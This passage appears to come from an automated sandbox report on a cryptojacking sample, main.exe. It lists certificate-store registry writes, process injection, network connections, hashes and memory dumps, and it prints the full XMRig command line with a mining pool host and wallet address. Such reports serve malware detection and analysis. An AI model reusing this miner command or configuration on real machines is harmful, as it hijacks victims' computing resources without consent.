b23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2612 wrote to memory of 4056 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2612 wrote to memory of 4056 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.239.69.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4056-16-0x0000024D6F110000-0x0000024D6F130000-memory.dmp
memory/4056-17-0x0000024D70880000-0x0000024D708A0000-memory.dmp
memory/4056-18-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-19-0x0000024D708C0000-0x0000024D708E0000-memory.dmp
memory/4056-20-0x0000024D708A0000-0x0000024D708C0000-memory.dmp
memory/4056-21-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-22-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-25-0x0000024D708A0000-0x0000024D708C0000-memory.dmp
memory/4056-24-0x0000024D708C0000-0x0000024D708E0000-memory.dmp
memory/4056-23-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-26-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-27-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-28-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-29-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-30-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-31-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-32-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-33-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-34-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-35-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-36-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-37-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-38-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-39-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-40-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-41-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-42-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-43-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-44-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-45-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-46-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-47-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-48-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-49-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-50-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-51-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-52-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-53-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-54-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-55-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-56-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-57-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-58-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-59-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-60-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-61-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-62-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-63-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-64-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-65-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-66-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-67-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-68-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-69-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-70-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-71-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-72-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-73-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-74-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-75-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-76-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-77-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-78-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-79-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-80-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-81-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-82-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-83-0x00007FF733880000-0x00007FF734383000-memory.dmp
memory/4056-84-0x00007FF733880000-0x00007FF734383000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:53
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4288 wrote to memory of 1460 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4288 wrote to memory of 1460 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4036,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4028 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1460-16-0x0000026676BE0000-0x0000026676C00000-memory.dmp
memory/1460-17-0x00000266784E0000-0x0000026678500000-memory.dmp
memory/1460-18-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-20-0x0000026678500000-0x0000026678520000-memory.dmp
memory/1460-21-0x0000026678520000-0x0000026678540000-memory.dmp
memory/1460-19-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-22-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-24-0x0000026678500000-0x0000026678520000-memory.dmp
memory/1460-23-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-25-0x0000026678520000-0x0000026678540000-memory.dmp
memory/1460-26-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-27-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-28-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-29-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-30-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-31-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-32-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-33-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-34-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-35-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-36-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-37-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-38-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-39-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-40-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-41-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-42-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-43-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-44-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-45-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-46-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-47-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-48-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-49-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-50-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-51-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-52-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-53-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-54-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-55-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-56-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-57-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-58-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-59-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-60-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-61-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-62-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-63-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-64-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-65-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-66-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-67-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-68-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-69-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-70-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-71-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-72-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-73-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-74-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-75-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-76-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-77-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-78-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-79-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-80-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-81-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-82-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-83-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
memory/1460-84-0x00007FF619A60000-0x00007FF61A563000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1810s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409d